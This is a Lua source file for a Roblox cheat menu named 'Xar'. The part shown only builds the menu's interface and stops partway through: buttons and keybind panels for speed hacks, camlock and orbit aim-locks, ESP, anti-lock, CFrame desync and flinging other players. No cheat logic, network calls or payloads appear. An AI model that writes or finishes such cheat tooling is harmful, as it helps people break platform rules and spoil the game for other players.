--[[ ██╗  ██╗ █████╗ ██████╗         ███╗   ███╗ █████╗ ██████╗ ███████╗    ██████╗ ██╗   ██╗    ██████╗ ██████╗ ██████╗  █████╗ ███╗   ██╗████████╗████████╗
╚██╗██╔╝██╔══██╗██╔══██╗        ████╗ ████║██╔══██╗██╔══██╗██╔════╝    ██╔══██╗╚██╗ ██╔╝    ╚════██╗╚════██╗╚════██╗██╔══██╗████╗  ██║╚══██╔══╝╚══██╔══╝
 ╚███╔╝ ███████║██████╔╝        ██╔████╔██║███████║██║  ██║█████╗      ██████╔╝ ╚████╔╝      █████╔╝ █████╔╝ █████╔╝███████║██╔██╗ ██║   ██║      ██║   
 ██╔██╗ ██╔══██║██╔══██╗        ██║╚██╔╝██║██╔══██║██║  ██║██╔══╝      ██╔══██╗  ╚██╔╝      ██╔═══╝ ██╔═══╝ ██╔═══╝ ██╔══██║██║╚██╗██║   ██║      ██║   
██╔╝ ██╗██║  ██║██║  ██║        ██║ ╚═╝ ██║██║  ██║██████╔╝███████╗    ██████╔╝   ██║       ███████╗███████╗███████╗██║  ██║██║ ╚████║   ██║      ██║   
╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝        ╚═╝     ╚═╝╚═╝  ╚═╝╚═════╝ ╚══════╝    ╚═════╝    ╚═╝       ╚══════╝╚══════╝╚══════╝╚═╝  ╚═╝╚═╝  ╚═══╝   ╚═╝      ╚═╝            
]]
--[[
    dont skid this script u bum quit looking at my source
]]
task.spawn(function()

	local XarGui1 = Instance.new("ScreenGui")
	local BaseFrame = Instance.new("Frame")
	local Buttons = Instance.new("Frame")
	local UIGridLayout = Instance.new("UIGridLayout")
	local Speed = Instance.new("TextButton")
	local UICorner = Instance.new("UICorner")
	local Camlock = Instance.new("TextButton")
	local UICorner_2 = Instance.new("UICorner")
	local Orbit = Instance.new("TextButton")
	local UICorner_3 = Instance.new("UICorner")
	local Anti = Instance.new("TextButton")
	local UICorner_4 = Instance.new("UICorner")
	local CFrameDesync = Instance.new("TextButton")
	local UICorner_5 = Instance.new("UICorner")
	local Resolver = Instance.new("TextButton")
	local UICorner_6 = Instance.new("UICorner")
	local Fling = Instance.new("TextButton")
	local UICorner_7 = Instance.new("UICorner")
	local ESP = Instance.new("TextButton")
	local UICorner_8 = Instance.new("UICorner")
	local Xar = Instance.new("TextLabel")
	local UICorner_9 = Instance.new("UICorner")
	local Text2 = Instance.new("TextLabel")
	local SpeedSettings = Instance.new("Frame")
	local UICorner_10 = Instance.new("UICorner")
	local Frame = Instance.new("Frame")
	local UICorner_11 = Instance.new("UICorner")
	local Keybind = Instance.new("TextBox")
	local UICorner_12 = Instance.new("UICorner")
	local Speed_2 = Instance.new("TextBox")
	local UICorner_13 = Instance.new("UICorner")
	local Text1 = Instance.new("TextLabel")
	local Text2_2 = Instance.new("TextLabel")
	local Xar_2 = Instance.new("TextButton")
	local OrbitSettings = Instance.new("Frame")
	local UICorner_14 = Instance.new("UICorner")
	local Frame_2 = Instance.new("Frame")
	local UICorner_15 = Instance.new("UICorner")
	local Keybind_2 = Instance.new("TextBox")
	local UICorner_16 = Instance.new("UICorner")
	local Height = Instance.new("TextBox")
	local UICorner_17 = Instance.new("UICorner")
	local Text1_2 = Instance.new("TextLabel")
	local Text2_3 = Instance.new("TextLabel")
	local Xar_3 = Instance.new("TextButton")
	local AntiLockSettings = Instance.new("Frame")
	local UICorner_18 = Instance.new("UICorner")
	local Frame_3 = Instance.new("Frame")
	local UICorner_19 = Instance.new("UICorner")
	local Keybind_3 = Instance.new("TextBox")
	local UICorner_20 = Instance.new("UICorner")
	local Mode = Instance.new("TextBox")
	local UICorner_21 = Instance.new("UICorner")
	local Text1_3 = Instance.new("TextLabel")
	local Text2_4 = Instance.new("TextLabel")
	local Xar_4 = Instance.new("TextButton")
	local ESPSettings = Instance.new("Frame")
	local UICorner_22 = Instance.new("UICorner")
	local Frame_4 = Instance.new("Frame")
	local UICorner_23 = Instance.new("UICorner")
	local Keybind_4 = Instance.new("TextBox")
	local UICorner_24 = Instance.new("UICorner")
	local Text1_4 = Instance.new("TextLabel")
	local Text2_5 = Instance.new("TextLabel")
	local Xar_5 = Instance.new("TextButton")
	local ResolverSettings = Instance.new("Frame")
	local UICorner_25 = Instance.new("UICorner")
	local Frame_5 = Instance.new("Frame")
	local UICorner_26 = Instance.new("UICorner")
	local Keybind_5 = Instance.new("TextBox")
	local UICorner_27 = Instance.new("UICorner")
	local Text1_5 = Instance.new("TextLabel")
	local Text2_6 = Instance.new("TextLabel")
	local Xar_6 = Instance.new("TextButton")
	local FlingSettings = Instance.new("Frame")
	local UICorner_28 = Instance.new("UICorner")
	local Frame_6 = Instance.new("Frame")
	local UICorner_29 = Instance.new("UICorner")
	local Keybind_6 = Instance.new("TextBox")
	local UICorner_30 = Instance.new("UICorner")
	local Text1_6 = Instance.new("TextLabel")
	local Text2_7 = Instance.new("TextLabel")
	local Xar_7 = Instance.new("TextButton")
	local CamlockSettings = Instance.new("Frame")
	local UICorner_31 = Instance.new("UICorner")
	local Frame_7 = Instance.new("Frame")
	local UICorner_32 = Instance.new("UICorner")
	local Keybind_7 = Instance.new("TextBox")
	local UICorner_33 = Instance.new("UICorner")
	local Offset = Instance.new("TextBox")
	local UICorner_34 = Instance.new("UICorner")
	local Text1_7 = Instance.new("TextLabel")
	local Text2_8 = Instance.new("TextLabel")
	local Xar_8 = Instance.new("TextButton")
	local CFrameDesyncSettings = Instance.new("Frame")
	local UICorner_35 = Instance.new("UICorner")
	local Frame_8 = Instance.new("Frame")
	local UICorner_36 = Instance.new("UICorner")
	local Keybind_8 = Instance.new("TextBox")
	local UICorner_37 = Instance.new("UICorner")
	local Radius = Instance.new("TextBox")
	local UICorner_38 = Instance.new("UICorner")
	local Text1_8 = Instance.new("TextLabel")
	local Text2_9 = Instance.new("TextLabel")
	local Xar_9 = Instance.new("TextButton")

	--Properties:

	XarGui1.Name = "XarGui1"
	XarGui1.Parent = game.Players.LocalPlayer.PlayerGui
	XarGui1.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
	XarGui1.Enabled = false

	BaseFrame.Name = "BaseFrame"
	BaseFrame.Parent = XarGui1
	BaseFrame.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
	BaseFrame.BorderColor3 = Color3.fromRGB(0, 0, 0)
	BaseFrame.BorderSizePixel = 0
	BaseFrame.Position = UDim2.new(0.307098776, 0, 0.259282976, 0)
	BaseFrame.Size = UDim2.new(0, 500, 0, 300)
	BaseFrame.Active = true
	BaseFrame.Draggable = true

	Buttons.Name = "Buttons"
	Buttons.Parent = BaseFrame
	Buttons.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Buttons.BackgroundTransparency = 1.000
	Buttons.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Buttons.BorderSizePixel = 0
	Buttons.Position = UDim2.new(0.0900000036, 0, 0.126666665, 0)
	Buttons.Size = UDim2.new(0, 410, 0, 243)

	UIGridLayout.Parent = Buttons
	UIGridLayout.SortOrder = Enum.SortOrder.LayoutOrder
	UIGridLayout.CellPadding = UDim2.new(0, 3, 0, 5)
	UIGridLayout.CellSize = UDim2.new(0, 100, 0, 50)

	Speed.Name = "Speed"
	Speed.Parent = Buttons
	Speed.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
	Speed.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Speed.BorderSizePixel = 0
	Speed.Position = UDim2.new(0.0700000003, 0, 0.13333334, 0)
	Speed.Size = UDim2.new(0, 130, 0, 50)
	Speed.Font = Enum.Font.Unknown
	Speed.Text = "Speed"
	Speed.TextColor3 = Color3.fromRGB(255, 255, 255)
	Speed.TextScaled = true
	Speed.TextSize = 14.000
	Speed.TextWrapped = true

	UICorner.Parent = Speed

	Camlock.Name = "Camlock"
	Camlock.Parent = Buttons
	Camlock.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
	Camlock.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Camlock.BorderSizePixel = 0
	Camlock.Position = UDim2.new(0.629999995, 0, 0.13333334, 0)
	Camlock.Size = UDim2.new(0, 130, 0, 50)
	Camlock.Font = Enum.Font.Unknown
	Camlock.Text = "Camlock"
	Camlock.TextColor3 = Color3.fromRGB(255, 255, 255)
	Camlock.TextScaled = true
	Camlock.TextSize = 14.000
	Camlock.TextWrapped = true

	UICorner_2.Parent = Camlock

	Orbit.Name = "Orbit"
	Orbit.Parent = Buttons
	Orbit.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
	Orbit.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Orbit.BorderSizePixel = 0
	Orbit.Position = UDim2.new(0.0700000003, 0, 0.333333343, 0)
	Orbit.Size = UDim2.new(0, 130, 0, 50)
	Orbit.Font = Enum.Font.Unknown
	Orbit.Text = "Orbit Lock"
	Orbit.TextColor3 = Color3.fromRGB(255, 255, 255)
	Orbit.TextScaled = true
	Orbit.TextSize = 14.000
	Orbit.TextWrapped = true

	UICorner_3.Parent = Orbit

	Anti.Name = "Anti"
	Anti.Parent = Buttons
	Anti.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
	Anti.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Anti.BorderSizePixel = 0
	Anti.Position = UDim2.new(0.753658533, 0, 0, 0)
	Anti.Size = UDim2.new(0, 130, 0, 50)
	Anti.Font = Enum.Font.Unknown
	Anti.Text = "Anti-Lock"
	Anti.TextColor3 = Color3.fromRGB(255, 255, 255)
	Anti.TextScaled = true
	Anti.TextSize = 14.000
	Anti.TextWrapped = true

	UICorner_4.Parent = Anti

	CFrameDesync.Name = "CFrameDesync"
	CFrameDesync.Parent = Buttons
	CFrameDesync.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
	CFrameDesync.BorderColor3 = Color3.fromRGB(0, 0, 0)
	CFrameDesync.BorderSizePixel = 0
	CFrameDesync.Position = UDim2.new(0.0700000003, 0, 0.13333334, 0)
	CFrameDesync.Size = UDim2.new(0, 130, 0, 50)
	CFrameDesync.Font = Enum.Font.Unknown
	CFrameDesync.Text = "CFrame Desync"
	CFrameDesync.TextColor3 = Color3.fromRGB(255, 255, 255)
	CFrameDesync.TextScaled = true
	CFrameDesync.TextSize = 14.000
	CFrameDesync.TextWrapped = true

	UICorner_5.Parent = CFrameDesync

	Resolver.Name = "Resolver"
	Resolver.Parent = Buttons
	Resolver.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
	Resolver.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Resolver.BorderSizePixel = 0
	Resolver.Position = UDim2.new(0.629999995, 0, 0.13333334, 0)
	Resolver.Size = UDim2.new(0, 130, 0, 50)
	Resolver.Font = Enum.Font.Unknown
	Resolver.Text = "Resolver"
	Resolver.TextColor3 = Color3.fromRGB(255, 255, 255)
	Resolver.TextScaled = true
	Resolver.TextSize = 14.000
	Resolver.TextWrapped = true

	UICorner_6.Parent = Resolver

	Fling.Name = "Fling"
	Fling.Parent = Buttons
	Fling.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
	Fling.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Fling.BorderSizePixel = 0
	Fling.Position = UDim2.new(0.0700000003, 0, 0.333333343, 0)
	Fling.Size = UDim2.new(0, 130, 0, 50)
	Fling.Font = Enum.Font.Unknown
	Fling.Text = "Fling"
	Fling.TextColor3 = Color3.fromRGB(255, 255, 255)
	Fling.TextScaled = true
	Fling.TextSize = 14.000
	Fling.TextWrapped = true

	UICorner_7.Parent = Fling

	ESP.Name = "ESP"
	ESP.Parent = Buttons
	ESP.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
	ESP.BorderColor3 = Color3.fromRGB(0, 0, 0)
	ESP.BorderSizePixel = 0
	ESP.Position = UDim2.new(0.349999994, 0, 0.13333334, 0)
	ESP.Size = UDim2.new(0, 130, 0, 50)
	ESP.Font = Enum.Font.Unknown
	ESP.Text = "ESP"
	ESP.TextColor3 = Color3.fromRGB(255, 255, 255)
	ESP.TextScaled = true
	ESP.TextSize = 14.000
	ESP.TextWrapped = true

	UICorner_8.Parent = ESP

	Xar.Name = "Xar"
	Xar.Parent = BaseFrame
	Xar.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Xar.BackgroundTransparency = 1.000
	Xar.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Xar.BorderSizePixel = 0
	Xar.Position = UDim2.new(-0.00290124514, 0, -0.000717061339, 0)
	Xar.Size = UDim2.new(0, 60, 0, 30)
	Xar.Font = Enum.Font.Unknown
	Xar.Text = "Xar"
	Xar.TextColor3 = Color3.fromRGB(255, 255, 255)
	Xar.TextScaled = true
	Xar.TextSize = 14.000
	Xar.TextWrapped = true

	UICorner_9.Parent = BaseFrame

	Text2.Name = "Text2"
	Text2.Parent = BaseFrame
	Text2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Text2.BackgroundTransparency = 1.000
	Text2.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Text2.BorderSizePixel = 0
	Text2.Position = UDim2.new(0.139725834, 0, -0.00148630782, 0)
	Text2.Size = UDim2.new(0, 360, 0, 30)
	Text2.Font = Enum.Font.PatrickHand
	Text2.Text = "made by @222antt on rblx and discord | V1.3"
	Text2.TextColor3 = Color3.fromRGB(255, 255, 255)
	Text2.TextSize = 18.000
	Text2.TextWrapped = true

	SpeedSettings.Name = "SpeedSettings"
	SpeedSettings.Parent = XarGui1
	SpeedSettings.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
	SpeedSettings.BorderColor3 = Color3.fromRGB(0, 0, 0)
	SpeedSettings.BorderSizePixel = 0
	SpeedSettings.Position = UDim2.new(0.307098776, 0, 0.259282976, 0)
	SpeedSettings.Size = UDim2.new(0, 500, 0, 300)
	SpeedSettings.Visible = false

	UICorner_10.Parent = SpeedSettings

	Frame.Parent = SpeedSettings
	Frame.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
	Frame.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Frame.BorderSizePixel = 0
	Frame.Position = UDim2.new(0.100000001, 0, 0.166666672, 0)
	Frame.Size = UDim2.new(0, 399, 0, 221)

	UICorner_11.Parent = Frame

	Keybind.Name = "Keybind"
	Keybind.Parent = Frame
	Keybind.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
	Keybind.BackgroundTransparency = 0.500
	Keybind.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Keybind.BorderSizePixel = 0
	Keybind.Position = UDim2.new(0.250626564, 0, 0.235294119, 0)
	Keybind.Size = UDim2.new(0, 200, 0, 50)
	Keybind.Font = Enum.Font.Unknown
	Keybind.PlaceholderColor3 = Color3.fromRGB(255, 255, 255)
	Keybind.PlaceholderText = "Keybind"
	Keybind.Text = "Z"
	Keybind.TextColor3 = Color3.fromRGB(255, 255, 255)
	Keybind.TextScaled = true
	Keybind.TextSize = 14.000
	Keybind.TextWrapped = true

	UICorner_12.Parent = Keybind

	Speed_2.Name = "Speed"
	Speed_2.Parent = Frame
	Speed_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
	Speed_2.BackgroundTransparency = 0.500
	Speed_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Speed_2.BorderSizePixel = 0
	Speed_2.Position = UDim2.new(0.250626564, 0, 0.533936679, 0)
	Speed_2.Size = UDim2.new(0, 200, 0, 50)
	Speed_2.Font = Enum.Font.Unknown
	Speed_2.PlaceholderColor3 = Color3.fromRGB(255, 255, 255)
	Speed_2.PlaceholderText = "Speed"
	Speed_2.Text = "2.5"
	Speed_2.TextColor3 = Color3.fromRGB(255, 255, 255)
	Speed_2.TextScaled = true
	Speed_2.TextSize = 14.000
	Speed_2.TextWrapped = true

	UICorner_13.Parent = Speed_2

	Text1.Name = "Text1"
	Text1.Parent = Frame
	Text1.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
	Text1.BackgroundTransparency = 1.000
	Text1.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Text1.BorderSizePixel = 0
	Text1.Position = UDim2.new(0.145363405, 0, -0.00361985434, 0)
	Text1.Size = UDim2.new(0, 283, 0, 50)
	Text1.Font = Enum.Font.Unknown
	Text1.Text = "Speed Settings"
	Text1.TextColor3 = Color3.fromRGB(255, 255, 255)
	Text1.TextScaled = true
	Text1.TextSize = 14.000
	Text1.TextWrapped = true

	Text2_2.Name = "Text2"
	Text2_2.Parent = Frame
	Text2_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Text2_2.BackgroundTransparency = 1.000
	Text2_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Text2_2.BorderSizePixel = 0
	Text2_2.Position = UDim2.new(0.0477258191, 0, -0.23148632, 0)
	Text2_2.Size = UDim2.new(0, 360, 0, 30)
	Text2_2.Font = Enum.Font.PatrickHand
	Text2_2.Text = "made by @222antt on rblx and discord | V1.3"
	Text2_2.TextColor3 = Color3.fromRGB(255, 255, 255)
	Text2_2.TextSize = 18.000
	Text2_2.TextWrapped = true

	Xar_2.Name = "Xar"
	Xar_2.Parent = SpeedSettings
	Xar_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Xar_2.BackgroundTransparency = 1.000
	Xar_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Xar_2.BorderSizePixel = 0
	Xar_2.Position = UDim2.new(-0.00300000003, 0, -0.00100000005, 0)
	Xar_2.Size = UDim2.new(0, 60, 0, 30)
	Xar_2.Font = Enum.Font.Unknown
	Xar_2.Text = "Xar"
	Xar_2.TextColor3 = Color3.fromRGB(255, 255, 255)
	Xar_2.TextScaled = true
	Xar_2.TextSize = 14.000
	Xar_2.TextWrapped = true

	OrbitSettings.Name = "OrbitSettings"
	OrbitSettings.Parent = XarGui1
	OrbitSettings.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
	OrbitSettings.BorderColor3 = Color3.fromRGB(0, 0, 0)
	OrbitSettings.BorderSizePixel = 0
	OrbitSettings.Position = UDim2.new(0.307098776, 0, 0.259282976, 0)
	OrbitSettings.Size = UDim2.new(0, 500, 0, 300)
	OrbitSettings.Visible = false

	UICorner_14.Parent = OrbitSettings

	Frame_2.Parent = OrbitSettings
	Frame_2.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
	Frame_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Frame_2.BorderSizePixel = 0
	Frame_2.Position = UDim2.new(0.100000001, 0, 0.166666672, 0)
	Frame_2.Size = UDim2.new(0, 399, 0, 221)

	UICorner_15.Parent = Frame_2

	Keybind_2.Name = "Keybind"
	Keybind_2.Parent = Frame_2
	Keybind_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
	Keybind_2.BackgroundTransparency = 0.500
	Keybind_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Keybind_2.BorderSizePixel = 0
	Keybind_2.Position = UDim2.new(0.250626564, 0, 0.235294119, 0)
	Keybind_2.Size = UDim2.new(0, 200, 0, 50)
	Keybind_2.Font = Enum.Font.Unknown
	Keybind_2.PlaceholderColor3 = Color3.fromRGB(255, 255, 255)
	Keybind_2.PlaceholderText = "Keybind"
	Keybind_2.Text = "V"
	Keybind_2.TextColor3 = Color3.fromRGB(255, 255, 255)
	Keybind_2.TextScaled = true
	Keybind_2.TextSize = 14.000
	Keybind_2.TextWrapped = true

	UICorner_16.Parent = Keybind_2

	Height.Name = "Height"
	Height.Parent = Frame_2
	Height.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
	Height.BackgroundTransparency = 0.500
	Height.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Height.BorderSizePixel = 0
	Height.Position = UDim2.new(0.250626564, 0, 0.533936679, 0)
	Height.Size = UDim2.new(0, 200, 0, 50)
	Height.Font = Enum.Font.Unknown
	Height.PlaceholderColor3 = Color3.fromRGB(255, 255, 255)
	Height.PlaceholderText = "Height"
	Height.Text = "25"
	Height.TextColor3 = Color3.fromRGB(255, 255, 255)
	Height.TextScaled = true
	Height.TextSize = 14.000
	Height.TextWrapped = true

	UICorner_17.Parent = Height

	Text1_2.Name = "Text1"
	Text1_2.Parent = Frame_2
	Text1_2.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
	Text1_2.BackgroundTransparency = 1.000
	Text1_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Text1_2.BorderSizePixel = 0
	Text1_2.Position = UDim2.new(0.145363405, 0, -0.00361985434, 0)
	Text1_2.Size = UDim2.new(0, 283, 0, 50)
	Text1_2.Font = Enum.Font.Unknown
	Text1_2.Text = "Orbit Lock Settings"
	Text1_2.TextColor3 = Color3.fromRGB(255, 255, 255)
	Text1_2.TextScaled = true
	Text1_2.TextSize = 14.000
	Text1_2.TextWrapped = true

	Text2_3.Name = "Text2"
	Text2_3.Parent = Frame_2
	Text2_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Text2_3.BackgroundTransparency = 1.000
	Text2_3.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Text2_3.BorderSizePixel = 0
	Text2_3.Position = UDim2.new(0.0477258191, 0, -0.23148632, 0)
	Text2_3.Size = UDim2.new(0, 360, 0, 30)
	Text2_3.Font = Enum.Font.PatrickHand
	Text2_3.Text = "made by @222antt on rblx and discord | V1.3"
	Text2_3.TextColor3 = Color3.fromRGB(255, 255, 255)
	Text2_3.TextSize = 18.000
	Text2_3.TextWrapped = true

	Xar_3.Name = "Xar"
	Xar_3.Parent = OrbitSettings
	Xar_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Xar_3.BackgroundTransparency = 1.000
	Xar_3.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Xar_3.BorderSizePixel = 0
	Xar_3.Position = UDim2.new(-0.00300000003, 0, -0.00100000005, 0)
	Xar_3.Size = UDim2.new(0, 60, 0, 30)
	Xar_3.Font = Enum.Font.Unknown
	Xar_3.Text = "Xar"
	Xar_3.TextColor3 = Color3.fromRGB(255, 255, 255)
	Xar_3.TextScaled = true
	Xar_3.TextSize = 14.000
	Xar_3.TextWrapped = true

	AntiLockSettings.Name = "AntiLockSettings"
	AntiLockSettings.Parent = XarGui1
	AntiLockSettings.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
	AntiLockSettings.BorderColor3 = Color3.fromRGB(0, 0, 0)
	AntiLockSettings.BorderSizePixel = 0
	AntiLockSettings.Position = UDim2.new(0.307098776, 0, 0.259282976, 0)
	AntiLockSettings.Size = UDim2.new(0, 500, 0, 300)
	AntiLockSettings.Visible = false

	UICorner_18.Parent = AntiLockSettings

	Frame_3.Parent = AntiLockSettings
	Frame_3.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
	Frame_3.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Frame_3.BorderSizePixel = 0
	Frame_3.Position = UDim2.new(0.100000001, 0, 0.166666672, 0)
	Frame_3.Size = UDim2.new(0, 399, 0, 221)

	UICorner_19.Parent = Frame_3

	Keybind_3.Name = "Keybind"
	Keybind_3.Parent = Frame_3
	Keybind_3.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
	Keybind_3.BackgroundTransparency = 0.500
	Keybind_3.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Keybind_3.BorderSizePixel = 0
	Keybind_3.Position = UDim2.new(0.250626564, 0, 0.235294119, 0)
	Keybind_3.Size = UDim2.new(0, 200, 0, 50)
	Keybind_3.Font = Enum.Font.Unknown
	Keybind_3.PlaceholderColor3 = Color3.fromRGB(255, 255, 255)
	Keybind_3.PlaceholderText = "Keybind"
	Keybind_3.Text = "Y"
	Keybind_3.TextColor3 = Color3.fromRGB(255, 255, 255)
	Keybind_3.TextScaled = true
	Keybind_3.TextSize = 14.000
	Keybind_3.TextWrapped = true

	UICorner_20.Parent = Keybind_3

	Mode.Name = "Mode"
	Mode.Parent = Frame_3
	Mode.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
	Mode.BackgroundTransparency = 0.500
	Mode.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Mode.BorderSizePixel = 0
	Mode.Position = UDim2.new(0.250626564, 0, 0.533936679, 0)
	Mode.Size = UDim2.new(0, 200, 0, 50)
	Mode.Font = Enum.Font.Unknown
	Mode.PlaceholderColor3 = Color3.fromRGB(255, 255, 255)
	Mode.PlaceholderText = "Mode"
	Mode.Text = "1"
	Mode.TextColor3 = Color3.fromRGB(255, 255, 255)
	Mode.TextScaled = true
	Mode.TextSize = 14.000
	Mode.TextWrapped = true

	UICorner_21.Parent = Mode

	Text1_3.Name = "Text1"
	Text1_3.Parent = Frame_3
	Text1_3.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
	Text1_3.BackgroundTransparency = 1.000
	Text1_3.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Text1_3.BorderSizePixel = 0
	Text1_3.Position = UDim2.new(0.145363405, 0, -0.00361985434, 0)
	Text1_3.Size = UDim2.new(0, 283, 0, 50)
	Text1_3.Font = Enum.Font.Unknown
	Text1_3.Text = "Anti-Lock Settings"
	Text1_3.TextColor3 = Color3.fromRGB(255, 255, 255)
	Text1_3.TextScaled = true
	Text1_3.TextSize = 14.000
	Text1_3.TextWrapped = true

	Text2_4.Name = "Text2"
	Text2_4.Parent = Frame_3
	Text2_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Text2_4.BackgroundTransparency = 1.000
	Text2_4.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Text2_4.BorderSizePixel = 0
	Text2_4.Position = UDim2.new(0.0477258191, 0, -0.23148632, 0)
	Text2_4.Size = UDim2.new(0, 360, 0, 30)
	Text2_4.Font = Enum.Font.PatrickHand
	Text2_4.Text = "made by @222antt on rblx and discord | V1.3"
	Text2_4.TextColor3 = Color3.fromRGB(255, 255, 255)
	Text2_4.TextSize = 18.000
	Text2_4.TextWrapped = true

	Xar_4.Name = "Xar"
	Xar_4.Parent = AntiLockSettings
	Xar_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Xar_4.BackgroundTransparency = 1.000
	Xar_4.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Xar_4.BorderSizePixel = 0
	Xar_4.Position = UDim2.new(-0.00300000003, 0, -0.00100000005, 0)
	Xar_4.Size = UDim2.new(0, 60, 0, 30)
	Xar_4.Font = Enum.Font.Unknown
	Xar_4.Text = "Xar"
	Xar_4.TextColor3 = Color3.fromRGB(255, 255, 255)
	Xar_4.TextScaled = true
	Xar_4.TextSize = 14.000
	Xar_4.TextWrapped = true

	ESPSettings.Name = "ESPSettings"
	ESPSettings.Parent = XarGui1
	ESPSettings.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
	ESPSettings.BorderColor3 = Color3.fromRGB(0, 0, 0)
	ESPSettings.BorderSizePixel = 0
	ESPSettings.Position = UDim2.new(0.307098776, 0, 0.259282976, 0)
	ESPSettings.Size = UDim2.new(0, 500, 0, 300)
	ESPSettings.Visible = false

	UICorner_22.Parent = ESPSettings

	Frame_4.Parent = ESPSettings
	Frame_4.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
	Frame_4.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Frame_4.BorderSizePixel = 0
	Frame_4.Position = UDim2.new(0.100000001, 0, 0.166666672, 0)
	Frame_4.Size = UDim2.new(0, 399, 0, 221)

	UICorner_23.Parent = Frame_4

	Keybind_4.Name = "Keybind"
	Keybind_4.Parent = Frame_4
	Keybind_4.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
	Keybind_4.BackgroundTransparency = 0.500
	Keybind_4.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Keybind_4.BorderSizePixel = 0
	Keybind_4.Position = UDim2.new(0.250626564, 0, 0.235294119, 0)
	Keybind_4.Size = UDim2.new(0, 200, 0, 50)
	Keybind_4.Font = Enum.Font.Unknown
	Keybind_4.PlaceholderColor3 = Color3.fromRGB(255, 255, 255)
	Keybind_4.PlaceholderText = "Keybind"
	Keybind_4.Text = "L"
	Keybind_4.TextColor3 = Color3.fromRGB(255, 255, 255)
	Keybind_4.TextScaled = true
	Keybind_4.TextSize = 14.000
	Keybind_4.TextWrapped = true

	UICorner_24.Parent = Keybind_4

	Text1_4.Name = "Text1"
	Text1_4.Parent = Frame_4
	Text1_4.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
	Text1_4.BackgroundTransparency = 1.000
	Text1_4.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Text1_4.BorderSizePixel = 0
	Text1_4.Position = UDim2.new(0.145363405, 0, -0.00361985434, 0)
	Text1_4.Size = UDim2.new(0, 283, 0, 50)
	Text1_4.Font = Enum.Font.Unknown
	Text1_4.Text = "ESP Settings"
	Text1_4.TextColor3 = Color3.fromRGB(255, 255, 255)
	Text1_4.TextScaled = true
	Text1_4.TextSize = 14.000
	Text1_4.TextWrapped = true

	Text2_5.Name = "Text2"
	Text2_5.Parent = Frame_4
	Text2_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Text2_5.BackgroundTransparency = 1.000
	Text2_5.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Text2_5.BorderSizePixel = 0
	Text2_5.Position = UDim2.new(0.0477258191, 0, -0.23148632, 0)
	Text2_5.Size = UDim2.new(0, 360, 0, 30)
	Text2_5.Font = Enum.Font.PatrickHand
	Text2_5.Text = "made by @222antt on rblx and discord | V1.3"
	Text2_5.TextColor3 = Color3.fromRGB(255, 255, 255)
	Text2_5.TextSize = 18.000
	Text2_5.TextWrapped = true

	Xar_5.Name = "Xar"
	Xar_5.Parent = ESPSettings
	Xar_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Xar_5.BackgroundTransparency = 1.000
